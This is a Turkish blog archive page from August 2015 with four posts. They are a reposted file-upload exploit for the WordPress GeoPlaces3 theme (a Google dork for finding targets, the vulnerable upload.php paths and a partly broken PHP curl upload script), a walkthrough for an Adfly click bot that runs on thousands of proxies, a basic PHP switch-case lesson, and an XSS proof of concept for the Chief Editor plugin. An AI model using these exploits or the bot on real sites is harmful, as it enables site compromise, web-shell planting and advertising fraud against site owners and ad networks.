-
24 Ağustos 2015 Pazartesi
WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility



# Description : Wordpress Themes GeoPlaces3 - Arbitrary File Upload vulnerbility
# Google Dork: inurl:/wp-content/themes/GeoPlaces3/
# Date: 23 August 2015
# Vendor Homepage: http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme
# Tested on: Win 7 & Win 8.1
# Author: Mdn_Newbie | Gantengers Crew
# https://forum.gantengers-crew.org/
  
##################################################################################
  
Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php
      wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php
  
Path    : /wp-content/uploads/tmp/
  
  
<?php
   
$uploadfile="m.jpg";
$ch =
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
   
?>
 
# 0day.today [2015-08-25]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r
DEVAMINI OKU..
13 Ağustos 2015 Perşembe
Adfly Bot Ağustos 2015 Güncel Resimli Anlatım

Merhaba arkadaşlar bugün sizlere yeni adfly botunu tanıtacağım.
Bu yeni botta ban yeme ihtimaliniz yok! ve sadece amerika proxyleri var!
Yeni Güncel 7000 Tane Proxy Eklenmiştir!
Fazla Uzatmadan işe yaradığını göstermek için kendi adfly hesabım  (İsmimi kapatmamın sebebi bazı kişiler şikayet edebilir )



Gördüğünüz gibi 103.08665$ beleş kazancım var 
Şimdi anlatıma geçelim.
Öncelikle Verdiğim linkten programı indirin(NOT: Link Benim değildir)
Programı İndir
7000 tane Proxy İndir

Programı Açın. Böyle Gözüküyor

Enable proxy deyip indirdiğiniz linkteki dosyanın içinde olan proxys klasörünü açın ve proxys.txt yi seçin.

Daha sonra Üst taraftan kendi adfly linklerinizi ekleyin

Ve Son Başlatın Ve Paralar Gelsin...
Yapamayanlar için video
Virustotal Tıkla
    
DEVAMINI OKU..
5 Ağustos 2015 Çarşamba
Php 'de Switch Case Kodları Ders 10




######İndex.Php Kodları############

<form action="kontrol.php" method="POST">
<table cellpadding="5" cellspacing="5">



                    <tr>
 
 
  <td>Ad Soyad: </td>
  <td><input type="text" name="adsoyad" /></td>
 
  </tr>
 
  <tr>
 
  <td>Sehir : </td>
  <td><select name="sehir">
  <option value="a">İstanbul</option>
  <option value="b">Bursa</option>
  <option value="c">Ankara</option>
  <option value="d">Adana</option>
  <option value="e">İzmir</option></select></td>
 
 
  </tr>
  <tr>
 
 
  <td></td>
  <td><input type="submit" value="Gönder" /></td>
 
 
 
  </tr>
 


<table>
</form>


##################Kontrol.php Kodları ##############3

<?php

$adsoyad = $_POST["adsoyad"] ;
$sehir       = $_POST["sehir"] ;

echo "Adınız ve Soyadınız : ".$adsoyad ;

/*if ($sehir == "a") {
echo "Seçtiniz Şehir İstanbul" ;

} elseif($sehir =="b") {
echo "Seçtiniz sehir Bursa" ;

} elseif ($sehir =="c" ) {
echo "Sectiniz sehir Ankaradır" ;

} else {
echo "Farklı Bir Şehir sectiniz" ;
}*/

switch ($sehir) {
case"a" ;
echo "Seçtiniz Şehir İstanbul" ;
break ;

case"b" ;
echo "Seçtiniz sehir Bursa" ;
break ;

case"c" ;
echo "Sectiniz sehir Ankaradır" ;
break ;

default ;
echo  " Farklı bir şehir sectiniz" ;
break ;
}

?>
DEVAMINI OKU..
4 Ağustos 2015 Salı
WordPress Chief Editor 3.6.1 Cross Site Scripting Vulnerability


Full BaslikWordPress Chief Editor 3.6.1 Cross Site Scripting Vulnerability
Eklenme Tarihi04-08-2015
Kategoriweb applications
Platformphp
Risk
Security Risk Low

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Title: WordPress 'Chief Editor' Plugin
Version: 3.6.1
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-17
Download:
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Helps wordpress multisite "chief editor" to manage all drafts, comments, authors and "ready for publication" sends across the netw
 
## Vulnerabilities
==========================================================
Some POST parameters are printed directly to the HTML without being sanitized.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp422/wp-admin/admin.php?page=chief-editor-dashboard">
<input type="text" name="submitDate" value="someValue"><br />
<input type="text" name="datepicker" value=""/><script>alert(1)</script>"><br />
<input type="text" name="blog_id" value=""/><script>alert(2)</script>"><br />
<input type="text" name="post_id" value=""/><script>alert(3)</script>"><br />
<input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
 
# 0day.today [2015-08-04]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r
DEVAMINI OKU..